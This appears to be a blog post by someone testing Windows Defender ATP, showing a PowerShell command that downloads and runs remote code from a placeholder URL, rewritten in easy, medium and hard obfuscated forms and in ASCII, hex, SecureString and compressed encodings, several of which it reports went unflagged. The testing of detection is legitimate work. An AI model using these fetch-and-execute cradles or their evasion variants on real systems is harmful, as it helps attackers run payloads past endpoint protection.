While testing Windows Defender Advanced Threat Protection (WDATP), I ran various PowerShell scripts to invoke certain downloads or specific tasks. As I was doing it, I wondered if it was smart enough to see obfuscated commands. Then I wondered how I could obfuscate them to make it harder to understand.
As an example, I will use the following command line with a made-up URL:
Invoke-Expression (New-Object System.Net.WebClient).DownloadString(“https://bit.ly/sample”)
The command, simple retrieves the file from the URL specified and loads it into the current PowerShell session. WDATP. Easily recognizes the standard command, with ease and flags it. What about if we try a few different obfuscation approaches. See for the examples used below: http://rvasec.com/slides/2017/Bohannon_Daniel–RVAsec_2017.pptx
Easy Obfuscation
Invoke-Expression (New-Object Net.WebClient).DownloadString(“htt” + “ps://” + “bit.ly/sample”)
Invoke-Expression (New-Object Net.WebClient).DownloadString(‘htt’ + ‘ps://’ + ‘bit.ly/sample’)
Invoke-Expression (New-Object Net.WebClient).”`D`o`wn`l`oa`d`Str`in`g”(‘htt’ + ‘ps://’ + ‘bit.ly/sample’)
Medium Obfuscation
Invoke-Expression (New-Object Net.WebClient).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”(‘htt’ + ‘ps://’ + ‘bit.ly/sample’)
Invoke-Expression (New-Object “`N`e`T`.`W`e`B`C`l`i`e`N`t”).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”(‘htt’ + ‘ps://’ + ‘bit.ly/sample’)
Invoke-Expression (& (`G`C`M *w-O*) “`N`e`T`.`W`e`B`C`l`i`e`N`T”).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”( ‘ht’+’tps://’ + ‘bit.ly/sample’)
Hard Obfuscation
`I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N (& (`G`C`M *w-O*) “`N`e`T`.`W`e`B`C`l`i`e`N`T”).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”( ‘ht’+’tps://bit.ly/sample’)
. ((${`E`x`e`c`u`T`i`o`N`C`o`N`T`e`x`T}.”`I`N`V`o`k`e`C`o`m`m`A`N`d”). “`N`e`w`S`c`R`i`p`T`B`l`o`c`k“((& (`G`C`M *w-O*) “`N`e`T`.`W`e`B`C`l`i`e`N`T”).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”( ‘ht’+’tps://bit.ly/sample’)))
Interestingly, I did not see these get flagged and show up the console. However, when I ran it this way it did:
powershell -nop -c “iex(New-Object Net.WebClient).DownloadString(‘http://bit.ly/sample’)”
Even using the “Invoke-Obfuscation” framework with something like the following three didn’t raise the alert.
ASCII Encoding
[StRiNg]::JoIn( ” , [ChaR[]](73, 110, 118 ,111,107,101, 45 , 69, 120 ,112, 114 , 101, 115 ,115 , 105,111, 110,32,40,78 , 101 ,119, 45, 79 , 98 ,106 , 101 , 99 ,116, 32 , 83, 121,115 , 116, 101,109 , 46 , 78 , 101 ,116, 46,87,101, 98 ,67 ,108,105,101 , 110, 116,41 , 46, 68 , 111 , 119, 110 ,108 ,111, 97,100 ,83 , 116 , 114, 105 ,110, 103, 40 ,39, 104 ,116 , 116, 112 ,58,47,47 ,98 , 105,116,46 , 108 , 121, 47 , 115, 97, 109 , 112,108, 101 ,39, 41 ))|& ((gv ‘*MDr*’).NamE[3,11,2]-joiN”)
HEX Encoding
&( $sHeLlId[1]+$SHeLLiD[13]+’x’)(( ( 49, ‘6e’ , 76, ‘6f’,’6b’, 65,’2d’,45 , 78, 70, 72,65 , 73, 73,69, ‘6f’ , ‘6e’ ,20,28,’4e’ ,65 , 77, ‘2d’, ‘4f’ ,62, ‘6a’, 65,63 ,74 , 20 , 53 , 79,73 ,74,65,’6d’,’2e’,’4e’ , 65 ,74 , ‘2e’ , 57,65, 62,43,’6c’ ,69, 65,’6e’, 74,29 ,’2e’, 44 , ‘6f’ , 77, ‘6e’,’6c’ , ‘6f’ ,61, 64, 53,74 , 72 ,69 , ‘6e’ , 67, 28, 27, 68 , 74,74, 70 , ‘3a’ , ‘2f’ , ‘2f’,62 , 69, 74 ,’2e’ , ‘6c’, 79,’2f’ ,73, 61 , ‘6d’ , 70 ,’6c’,65, 27, 29)|foreAcH-objeCt {([COnvERT]::tOiNT16(( $_.TOSTrinG()), 16 )-as [chAR])} ) -JOin ”)
SecureString (AES) Encoding
.( $PsHOMe[4]+$PsHoMe[34]+’x’)(([ruNtiMe.inteROpseRViCes.MaRsHaL]::ptRtoStRinGuNi( [RuNTime.iNTERoPservIcES.marSHAL]::SecureStrinGToGLoBalaLLocuniCoDE($(‘76492d1116743f0423413b16050a5345MgB8AG0ARwBnAEEAUgBGAE8AMwB6AGsAbABPAEUAcgBNADEATgB5AHMAZAB2AGcAPQA9AHwAMwAxADgAZgBkADQAOABmADQAYQA2AGUAMgBjADkAOQA0AGYAZgAxADQAZQBhADcANwBkAGQAMwBmADgAZgAyAGUAMABkAGQAMAA1ADUANgA3AGMAYgA3AGUAOQBlADYAOQBmAGYAZABjADEANgBhADYAMwA0AGIANgA3ADQAYwBlAGQAMwAxAGUAZgAxADEANAA0ADIAMABkADgANgA0AGIAOABjAGUAOABkAGYAMgAyAGMAZAA1AGMAZgAzADYAOABmADAAYwA5AGQAYQA1ADAAYwA4AGQAMABiAGIANAA4ADcAYQAzADUAYwBlADAAZAA1AGYAYwAxAGQANQBjAGEAZgBiADYAYwAxADYAZQBlAGUAMgA0ADMANwA1AGYAOABhADkAZAA1AGQAZgBjADAAMAAyADQANwBiAGIAMABmADcAOQA4AGYAMQA0ADkAZAA3AGUAMwBmADgAMQBiADMAOAA5ADUANgAzADcAYQA0AGEAOQBhAGIANAA1ADgAZgBmAGYAMQAzADQAYgA0ADcAMAA4ADcAMQA0ADIAZQBkADIANwBjADQAMAAzAGQAMgA4AGQAZgAzAGQAZQBkADYAMABjADMAMQBlADkAMgBlAGMANABiAGQAZQBkADMAMAA5AGEAMwA0ADYAZABhADkAZQBlADcAZgBlADQAMQA3AGUAZQA0ADAAMgA4AGIAMgAzAGIAYwA5ADUANQA4AGQAMwA4AGIAYwAwADQAMQBiAGIAZABjADQAMABlADgAZAA4ADYAZgA1AGYAMwAwAGYANAAxADAAOAA4ADAAYQA2AGEAZQAxADgAZgA0ADkAZAA1ADYAMgA3AGIAZQA2ADAAZgAzADQANwAzAGYAYgAxAGUAZQBmADMAMAA3AGEANAA0ADYANwA5ADcAOQAwAGYAYwA5ADcANAAwADUAMQA5ADUAMQA3AGYAYwA5ADEAOAA5ADIAYgBjAGIANgAxADEANgA2ADEAZgBiADkANQA3ADcAZgAxADQAZQA4ADIA’| cOnVeRTTo-secUrestRING -KE (242..227)) )) ))
SecureString (AES) Encoding Compressed
(new-oBJect iO.COMPRESsiOn.deflATESTreAM( [Io.MEMoRyStreAm][SYStEm.convert]::FROmbASE64stRing(‘RVRdb+JADPwreThdQVURgdBe++Y0Kxodm3SBVAqIhzbNBcrXKdCGov7483i3OvEA3rU9nhkvXsub1++7Y6zLTrybqjr9Oynrp1VRHjpbGh+WtFnc3bXm4yzhHNWJk6kap4+HcoycSUcj53m06AzVUZfbUNWTVnseLDoJbVWbWz6lv0vGGGeMsWWM5FiOGUPVH/E9Y2iqDw80YoyJKt5rNZnWq2Q43VebNKQRjTb7Itutiv2rank/Whc318Ft79X3/euboP+nG/T6gd9/8a+7g+7zoB8MdBX+IpVRVtGAhjklFD6TCqig8BPnLyb8oGFFMwp7pDSVJrwmZWjShJoeCno0dEsPDaUUblGfG+pTZEg3iBXlDZ0pirmeTjTMaGbCJUWEc84rSBN1UZcazo80zSrOi3LO43uuT4h6NNTcD/kxaUM++iToF60pqYBjKK/okyKF7wb1msI1cLhfH3ncf4X7WcXnnC/1jDtz9UkFHOnfR8zfJ9QnMl/s+og+a5mnwrkG3x5FGfMJ35x+K8zN+YGraySW8ww6cJ8KeGfpVzkdDGLghRvcp+AJ3WTuAvxPdm7EBN3Oljf0lPkHwOP7pcxPPA/6GZ5D9ESdRv4a/bXooGxf6Eisn9W5i3jm+qTCPwPPrtUL9wQeZ8Sc3zifTsBnXwPRobL1lnfuzuEv5sotP455PvGLz7918+3+IJ99bqAH85K9yTFPz+Kij8Jc//MjY/lxnewj9sA43Z1/rMNGzuE3dDDWt9xYHWbiS4H5GsSMswQv0YHxEmP1T2X/Kudv5vxbu7lj+BNgL2SPwNu4PRC/vt+Bhi490a9x/VAnuqF+jfOu3Bv2F/tiLP/UuL0BLxs38j5Ex9i+Q9v3DJzU7bHsLd6D8DHuXRr3XnL7Drhv4nxOoRf2wlg+7OvGzf8mvjg/L7wv736/+1Dj43F/dVD3WV0epnW8G3pX69LzWjeDTicI2m2PP23v66fHf0+HZbkZxdHcX1y6369zv7+4vDhdtP8B’), [iO.CoMPresSiON.cOMPresSIoNmoDE]::dEcoMPreSs) |fOrEAch{ new-oBJect Io.sTREAmReadER($_ ,[SYSteM.tExT.eNcODinG]::AsciI) } ).readtoEND( ) | & ( ([sTRInG]$VErBOSeprEFerENCE)[1,3]+’x’-Join”)
To learn more about obfuscating PowerShell commands you can use the following links:
https://github.com/danielbohannon/Invoke-Obfuscation
https://www.sans.org/summit-archives/file/summit-archive-1492186586.pdf
https://blog.varonis.com/powershell-obfuscation-stealth-through-confusion-part-i/
https://blog.varonis.com/powershell-obfuscation-stealth-confusion-part-ii/
http://pentestit.com/invoke-obfuscation-powershell-command-script-obfuscator/
https://cobbr.io/ObfuscationDetection.html
https://gallery.technet.microsoft.com/scriptcenter/Generate-obfuscated-string-6ec72ffe
Now the good news is, if these were more malicious in nature than just downloading a file, then they would be flagged. For example using this method to download “Mimikatz” will trigger an alert.
You must log in to post a comment.